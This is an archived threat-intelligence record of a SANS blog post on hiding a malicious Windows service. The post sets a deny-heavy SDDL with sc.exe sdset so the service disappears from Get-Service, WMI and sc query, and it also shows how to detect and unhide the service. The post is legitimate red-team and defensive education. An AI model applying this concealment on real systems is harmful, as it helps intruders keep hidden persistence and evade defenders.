{
	"id": "7eee5281-2c97-4815-9135-b6048fb6f22d",
	"created_at": "2026-04-06T00:15:54.325559Z",
	"updated_at": "2026-04-10T03:19:55.72676Z",
	"deleted_at": null,
	"sha1_hash": "237c0bdbc5ca5c1209d0cc002ba3ef6ca6fef0a3",
	"title": "Red Team Tactics: Hiding Windows Services",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 58768,
	"plain_text": "Red Team Tactics: Hiding Windows Services\r\nBy Joshua Wright\r\nPublished: 2020-10-13 · Archived: 2026-04-05 21:06:57 UTC\r\nIn a recent red team engagement, my team was up against some well-trained, sophisticated defenders. We built\r\ncustom malware to evade the anticipated EDR platforms, but we knew host analysis would eventually get us\r\ncaught and quickly pulled from the target organization.\r\nPS C:\\WINDOWS\\system32\u003e Get-Service -Name SWCUEngine\r\nStatus Name DisplayName\r\n------ ---- -----------\r\nRunning SWCUEngine SWCUEngine\r\nTaking notes from several advanced threat groups, we will use common service names that could be overlooked to\r\ntry and blend into a system while maintaining persistence on the host. Here, SWCUEngine is our malware,\r\nshallowly pretending to be the AVAST software cleanup engine. While this might escape casual inspection, in an\r\nexercise where the defenders are actively hunting for the presence of the red team, this is probably going to get us\r\ncaught.\r\nSo, we decided to tie on a bit of extra difficulty.\r\nPS C:\\WINDOWS\\system32\u003e \u0026 $env:SystemRoot\\System32\\sc.exe sdset SWCUEngine \"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTS\r\n[SC] SetServiceObjectSecurity SUCCESS\r\nPS C:\\WINDOWS\\system32\u003e Get-Service -Name SWCUEngine\r\nGet-Service : Cannot find any service with service name 'SWCUEngine'.\r\nAt line:1 char:1\r\n+ Get-Service -Name SWCUEngine\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : ObjectNotFound: (SWCUEngine:String) [Get-Service], ServiceCommandException\r\n + FullyQualifiedErrorId : NoServiceFoundForGivenName,Microsoft.PowerShell.Commands.GetServiceCommand\r\nWindows services support the ability to control service permissions using the Service Descriptor Definition\r\nLanguage (SDDL). 
As administrators, we normally don't have to change the SDDL syntax of service permissions\r\nmanually, but through careful manipulation an attacker can hide their presence in a running service. In this\r\nexample, the imposter SWCUEngine service becomes mostly invisible to the blue team defenders.\r\nThe SDDL syntax is a little obtuse, but breaks down into the following elements:\r\nD: - Set the Discretionary ACL (DACL) permissions on the service\r\nhttps://www.sans.org/blog/red-team-tactics-hiding-windows-services/\r\nPage 1 of 3\n\n(D;;DCLCWPDTSD;;;IU) - Deny Interactive Users the following permissions:\r\n DC - Delete Child\r\n LC - List Children\r\n WP - Write Property\r\n DT - Delete Tree\r\n SD - Service Delete\r\nThis SDDL block is repeated for services (SU) and administrators (BA) as well. A (allow) permissions follow,\r\ninheriting the default permissions for services. Special thanks to Wayne Martin and Harry Johnston for their\r\narticles on decoding SDDL permissions.\r\nBy making this change to the service, the persistence mechanism is hidden from the defenders. Neither\r\nservices.exe, Get-Service, sc query nor any other service control tool I'm aware of will enumerate the hidden\r\nservice.\r\nPS C:\\WINDOWS\\system32\u003e Get-Service | Select-Object Name | Select-String -Pattern 'SWCUEngine'\r\nPS C:\\WINDOWS\\system32\u003e Get-WmiObject Win32_Service | Select-String -Pattern 'SWCUEngine'\r\nPS C:\\WINDOWS\\system32\u003e \u0026 $env:SystemRoot\\System32\\sc.exe query | Select-String -Pattern 'SWCUEngine'\r\nPS C:\\WINDOWS\\system32\r\nIf the defender knows the name of the service in advance, they can identify the service presence by attempting to\r\nstop it. 
In this example, the service JoshNoSuchService does not exist, while SWCUEngine exists and is hidden:\r\nPS C:\\WINDOWS\\system32\u003e Set-Service -Name JoshNoSuchService -Status Stopped\r\nSet-Service : Service JoshNoSuchService was not found on computer '.'.\r\nAt line:1 char:1\r\n+ Set-Service -Name JoshNoSuchService -Status Stopped\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : ObjectNotFound: (.:String) [Set-Service], InvalidOperationException\r\n + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.SetServiceCommand\r\nPS C:\\WINDOWS\\system32\u003e Set-Service -Name SWCUEngine -Status Stopped\r\nSet-Service : Service 'SWCUEngine (SWCUEngine)' cannot be configured due to the following error: Access is denie\r\nAt line:1 char:1\r\n+ Set-Service -Name SWCUEngine -Status Stopped\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : PermissionDenied: (System.ServiceProcess.ServiceController:ServiceController) [Set\r\n ServiceCommandException\r\n + FullyQualifiedErrorId : CouldNotSetService,Microsoft.PowerShell.Commands.SetServiceCommand\r\nIf you know the name of the service that is hidden, then you can unhide it again:\r\nPS C:\\WINDOWS\\system32\u003e \u0026 $env:SystemRoot\\System32\\sc.exe sdset SWCUEngine \"D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;C\r\n[SC] SetServiceObjectSecurity SUCCESS\r\nPS C:\\WINDOWS\\system32\u003e Get-Service -Name 'SWCUEngine'\r\nStatus Name DisplayName\r\n------ ---- -----------\r\nRunning SWCUEngine SWCUEngine\r\nOn the red team, this can be a useful technique to preserve persistence on a compromised host. The hidden service\r\nwill autostart after a reboot as well.\r\nIn the next article, my colleague and trusted defense analyst Jon Gorenflo will present defense options for\r\ndetection and enumeration. 
Stay tuned!\r\nSource: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.sans.org/blog/red-team-tactics-hiding-windows-services/"
	],
	"report_names": [
		"red-team-tactics-hiding-windows-services"
	],
	"threat_actors": [],
	"ts_created_at": 1775434554,
	"ts_updated_at": 1775791195,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/237c0bdbc5ca5c1209d0cc002ba3ef6ca6fef0a3.pdf",
		"text": "https://archive.orkl.eu/237c0bdbc5ca5c1209d0cc002ba3ef6ca6fef0a3.txt",
		"img": "https://archive.orkl.eu/237c0bdbc5ca5c1209d0cc002ba3ef6ca6fef0a3.jpg"
	}
}